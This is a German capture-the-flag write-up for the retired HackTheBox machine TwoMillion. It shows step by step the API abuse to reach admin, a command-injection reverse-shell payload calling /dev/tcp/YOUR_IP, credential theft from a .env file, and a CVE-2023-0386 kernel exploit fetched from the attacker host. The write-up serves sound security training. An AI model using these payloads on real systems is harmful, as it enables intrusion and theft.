
HackTheBox TwoMillion Maschinen-Writeup — API-Missbrauch, Befehlseinschleusung und CVE-2023-0386
HackTheBox TwoMillion Maschinen-Writeup — API-Missbrauch, Befehlsinjektion & CVE-2023-0386
| Feld | Details |
|---|---|
| Name | TwoMillion |
| Schwierigkeit | Easy |
| OS | Linux |
| IP | 10.10.11.221 |
| CVE | CVE-2023-0386 |
TwoMillion ist eine einfache Linux-Maschine, die sich um die alte HackTheBox-Plattform dreht. Sie umfasst das Dekodieren eines Einladungscodes, das Missbrauchen von API-Endpunkten, OS-Befehlsinjektion, das Auffinden von Anmeldeinformationen und eine Linux-Kernel-Privilegienausweitung via CVE-2023-0386 (OverlayFS).
nmap -sV -sC -v 10.10.11.221
Offene Ports:
2million.htb weiterZu /etc/hosts hinzufügen:
echo "10.10.11.221 2million.htb" >> /etc/hosts
curl -X POST http://2million.htb/api/v1/invite/how/to/generate
Antwort ist ROT13-kodiert. Dekodieren:
echo "Va beqre gb trarengr..." | tr 'A-Za-z' 'N-ZA-Mn-za-m'
Einladungscode generieren:
curl -X POST http://2million.htb/api/v1/invite/generate
echo "BASE64==" | base64 -d
Registrieren unter http://2million.htb/register mit dem dekodierten Einladungscode.
Einloggen über Browser, PHPSESSID aus Cookies holen (F12 → Anwendung → Cookies).
Zum Admin eskalieren:
curl -X PUT http://2million.htb/api/v1/admin/settings/update \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"email":"[email protected]","is_admin":1}'
Überprüfen:
curl -b "PHPSESSID=<your_session>" http://2million.htb/api/v1/admin/auth
# {"message":true}
Listener starten:
nc -lvnp 4444
Reverse-Shell-Payload senden:
curl -s -X POST http://2million.htb/api/v1/admin/vpn/generate \
-b "PHPSESSID=<your_session>" \
-H "Content-Type: application/json" \
--data '{"username":"test;bash -c '"'"'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"'"' #"}'
Shell als www-data empfangen.
Anmeldeinformationen in .env finden:
cat /var/www/html/.env
# DB_USERNAME=admin
# DB_PASSWORD=SuperDuperPass123
SSH einloggen:
ssh [email protected]
cat ~/user.txt
Hinweis prüfen:
cat /var/mail/admin
uname -r
# 5.15.70 — anfällig für CVE-2023-0386
Exploit auf Kali herunterladen und kompilieren:
git clone https://github.com/xkaneiki/CVE-2023-0386
cd CVE-2023-0386
make all
Auf das Ziel übertragen:
# Kali
python3 -m http.server 8000
# Ziel
wget http://YOUR_IP:8000/exploit.zip
unzip exploit.zip
make all
In zwei Terminals auf dem Ziel ausführen:
Terminal 1:
./fuse ./ovlcap/lower ./gc
Terminal 2:
./exp
Root-Flag holen:
cat /root/root.txt
Dieser Writeup dient nur zu Bildungszwecken auf einer ausgemusterten HackTheBox-Maschine.
| Schritt | Technik |
|---|
| Aufklärung | Nmap-Scan |
| Einladungscode | ROT13 + Base64-Dekodierung |
| Web-Privilegienausweitung | API-Manipulation → Admin |
| Erste Shell | OS-Befehlsinjektion |
| Laterale Bewegung | .env-Anmeldeinformationen → SSH |
| Root | CVE-2023-0386 OverlayFS-Exploit |